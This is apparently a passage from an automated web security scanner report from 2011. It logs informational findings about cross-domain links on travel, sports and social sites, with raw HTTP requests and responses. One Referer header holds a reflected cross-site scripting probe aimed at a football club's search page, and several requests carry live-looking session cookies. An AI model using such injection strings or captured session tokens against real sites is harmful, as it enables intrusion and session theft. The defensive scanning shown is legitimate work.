action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetContro
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Content-Length: 589661

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at/" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.be/" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ca/" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.dk/" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.fr/" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.de/" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie/" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.it/" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl/" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no/" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es/" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.se/" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...

19.188. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/scripts/exp/core/ChannelTracking.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /static/default/default/scripts/exp/core/ChannelTracking.js?v=1.1&v=release-2011-09-r3.10.274201 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"15348-1317085613836"
Last-Modified: Tue, 27 Sep 2011 01:06:53 GMT
Content-Type: text/javascript
Cteonnt-Length: 15348
Content-Length: 15348
Vary: Accept-Encoding
Cache-Control: private, max-age=37236
Date: Mon, 03 Oct 2011 00:10:39 GMT
Connection: close

//configuration --- can be put into separate file
//first flag indicates clear seoid
//second flag - null indicates check for SEMCID, true is to clear the cookie, false is don't clear the cookie
v
...[SNIP]...
/ footer        
       var footerDiv = document.getElementById('footer');
       var dynamicFooterDiv = document.createElement("div");
       dynamicFooterDiv.id = "msnnzFooterSuffix";
       dynamicFooterDiv.innerHTML = '<iframe scrolling=no frameborder=no style="height:65px; width:992px; border:none; overflow:hidden;" border="0" src="http://serviceslb-198436258.us-east-1.elb.amazonaws.com/Header/v1?pt=cobrand&partnerid=40654&pos=29&type=footer"></iframe>
...[SNIP]...

19.189. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=120836677942069&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22fd1ef3c%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=false&height=60&id=51212153078&locale=en_US&sdk=joey&show_faces=false&stream=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.119.45
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:49 GMT
Content-Length: 7701

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/CqGiwf44cv7.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/i6dwhw2w3_E.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/2a5cp8CEPck.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/nikefootball" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/276804_51212153078_1087383549_q.jpg" alt="Nike Football" /></a>
...[SNIP]...

19.190. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fmanchesterunited&width=303&colorscheme=dark&connections=0&stream=no&header=no&height=60 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.110.60
X-Cnection: close
Date: Mon, 03 Oct 2011 01:56:33 GMT
Content-Length: 8605

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/xfwWw0TCQIH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/p1kOEng59HG.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/3KQwHYVeQS2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/manchesterunited" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276862_7724542745_270400417_q.jpg" alt="Manchester United" /></a>
...[SNIP]...

19.191. http://www.getaroom.com/washington-dc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /washington-dc

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /washington-dc?amenities%5B%5D=&check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&commit=Go&lucky=true&page=1&property_name=&rinfo=%5B%5B18%5D%5D&search%5Bdestination%5D=m10&sort_order=position HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.3.8.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html; show_pu=pageview=1&allowed=true&shown=false; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "d2a96c7313287816400edfcdf271bec7"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 1110
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CjoLc2VhcmNoaQPmLuY6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNzQ2ZWU2NzIwNWNhYjFlZjA2OTIzYWNlNWE2NGUxMTQ6EF9jc3JmX3Rva2VuIjFIc3ZVTXFGbm9OeXdJNndseElkTFBVeGNBUVRPb2NIaTlJZERGd1ZxVkhjPToTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--5dfe791c81b6c944bb35ded07f19836e6a759bfc; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 170579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...
<link href="/apple-touch-icon.png?1303990536" type="image/png" rel="apple-touch-icon" />


<link rel="dns-prefetch" href="http://s3.amazonaws.com/" />

<meta name="y_key" content="06334f987d25f373" />
...[SNIP]...
<li class="deals"><a href="http://www.getaroomgetaways.com/hotel-deals/deals.html"><span class="mid">
...[SNIP]...
<li><a href="http://getaroom.hotelplanner.com/"><span class="mid">
...[SNIP]...
<li class="last-child"><a href="http://getaroom.neatgroup.com/getaroom/CPSearch?DD=GETAROOM"><span class="right-end-mid">
...[SNIP]...
<a href="/hotels/washington-court-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/7a9efb8e-f749-4171-88d1-a1a04b9b04a1/was-wcou_main_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/days-inn-connecticut-avenue" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/96af526b-0e8d-48f1-8191-024a87908fea/ext_night_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/lenfant-plaza-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/587ec07c-ca1d-4340-a73e-0c960618b336/images_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/capitol-skyline-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/3ad56081-8034-4604-8f05-62c26bb23b9c/was-capbldg_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/best-western-pentagon-reagan-airport" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/d0c3d9d9-85bb-43bc-b97a-316833519817/bw_ext_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-sheraton-national" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/6fba198b-88ad-4f3a-8867-9d50eea4869d/she829ex_34691_md_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/comfort-inn-suites-near-union-station-2" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/7ae77e1f-3460-4422-8ea8-2ff873bd6372/dc012a1_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/capitol-hill-suites" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/e9c0ef90-47c1-406b-9ea6-48cb55ff5f60/outside_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-churchill-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/6ddf5f2e-aaf3-4c13-aa41-c5027ae89ed3/churchill_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-hotel-at-arundel-preserve" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/643fc96f-fa6d-43cf-b999-9f4ba939384e/placetostay_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/best-western-mount-vernon" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/509b35b1-542d-4082-a9a9-d4f0c790f274/24271_23_b_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-normandy-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/dfe45354-d64d-4591-a935-355333db6417/normandy_exterior_gallery_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/comfort-inn-arlington-at-ballston" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/b581e0d4-8b73-4ea0-a76e-701a2ff5d500/was-ball_bldg_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-virginian-suites" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/0d02fbe5-e403-48a7-9987-4398e1dab25b/was-vasuit_main_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/best-western-manassas" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/c1bf0b64-07b0-4cd6-aac9-28a79323d4b8/was-bwma_bldg_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/gaylord-national" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/841b0f75-2133-463e-a1e0-0fa8b7b95ce5/exterior_f_2_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-quincy-suites" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/94470159-bd8b-40a4-85d9-d5dfe83c22b4/was-quin_main_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-madison" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/7dddc1e4-b172-482f-8401-5f89cf3c2daf/was-madi_bldg_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/hawthorn-suites-alexandria" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/90a59fa0-479e-4208-934b-13cc571ecab6/hawthorn_exterior_3_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/savoy-suites-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/7dc23653-794a-462f-b4c9-808d08497fc6/savoysuitesexterior1_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/best-western-capital-beltway-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/5fe183b4-5e23-4755-96fb-4b59dc987ee5/p_0001_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/westin-washington-dulles-airport" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/09176515-4f1b-4178-8a92-e2cd4b45f21a/wes3103cl.87291_md_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/best-western-rosslyniwo-jima" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/373a76ff-1bf5-4b21-8534-e937c79d718f/was-bwri_bldg2_grid_1.jpg" width="60" /></a>
...[SNIP]...
<br/>
<a href="http://www.google.com/support/bin/answer.py?answer=23852">How to enable JavaScript in your browser</a>
...[SNIP]...
</div>

<img src="http://ad.adtegrity.net/pixel?id=905511&amp;t=2" class="pixel" width="1" height="1" alt="" />
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1039030038/?label=O3AsCL6F6wEQlq657wM&amp;guid=ON&amp;script=0"/><img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032687336/?label=OlSFCLCK4AEQ6J227AM&amp;guid=ON&amp;script=0"/>


<!-- WAI-ARIA landmark roles: http://www.paciellogroup.com/blog/?p=106 -->
...[SNIP]...
<li><a class="badge badge-twitter" href="http://twitter.com/getaroomcom"><span>
...[SNIP]...
<li><a class="badge badge-facebook" href="http://www.facebook.com/pages/GetARoomcom/90405626754"><span>
...[SNIP]...
<li><a class="badge badge-youtube" href="http://www.youtube.com/user/getaroomcom"><span>
...[SNIP]...
<li><a href="http://www.getaroomgetaways.com/hotel-deals/deals.html">Hotel Deals</a>
...[SNIP]...
<p class="tripadvisor"><img src="http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif" width="207" height="51" alt="TripAdvisor" /></p>
...[SNIP]...

19.192. http://www.goal.com/en/comment/comments-box

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/comment/comments-box

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /en/comment/comments-box?allCommentsUrl=%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run%2Fcomments&entityId=13994828 HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5; l=en

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0,must-revalidate,s-maxage=300
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:56 GMT
Expires: Sat, 01 Oct 2011 23:58:55 +0000
Last-Modified: Sun, 02 Oct 2011 23:58:55 GMT
Server: ECS (sjo/5225)
Vary: Accept-Encoding
X-Cache: HIT
X-Goal-Flavors: ad970x40navbar
Content-Length: 7224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">

...[SNIP]...
<meta name="layout" content="include"/>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

19.193. http://www.google.com/cse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /cse

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
